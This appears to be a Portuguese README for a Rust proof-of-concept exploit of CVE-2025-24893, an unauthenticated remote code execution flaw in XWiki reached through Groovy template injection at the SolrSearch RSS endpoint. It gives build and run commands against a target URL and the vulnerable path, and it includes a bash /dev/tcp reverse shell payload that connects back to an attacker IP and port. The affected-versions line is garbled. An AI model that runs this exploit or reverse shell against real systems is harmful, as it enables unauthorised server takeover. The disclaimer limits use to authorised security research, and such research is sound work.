
Exploit de Prova de Conceito para CVE-2025-24893, uma vulnerabilidade de Execução Remota de Código (RCE) não autenticada no XWiki. Explora uma falha de injeção de template no endpoint SolrSearch por meio da execução de scripts Groovy.
Prova de conceito de exploração para CVE-2025-24893, uma vulnerabilidade crítica de Execução Remota de Código não autenticada no XWiki.
Este exploit abusa de uma injeção de template Groovy no endpoint SolrSearch para executar comandos arbitrários — incluindo reverse shells — sem autenticação.
Uma falha na forma como o XWiki processa entrada manipulada no endpoint RSS SolrSearch permite que atacantes injetem código Groovy no pipeline de renderização.
Isso possibilita RCE não autenticado via blocos de script {{groovy}}.
< 15.10.11>= 16.0.0 e < 16.4.115.10.1116.4.1Baixe o release:
ou compile a partir do código-fonte:
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
Há um payload de reverse shell pré-construído neste formato:
bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1
Este código é apenas para fins educacionais e pesquisas de segurança autorizadas. Não use este exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.
/bin/get/Main/SolrSearch?media=rss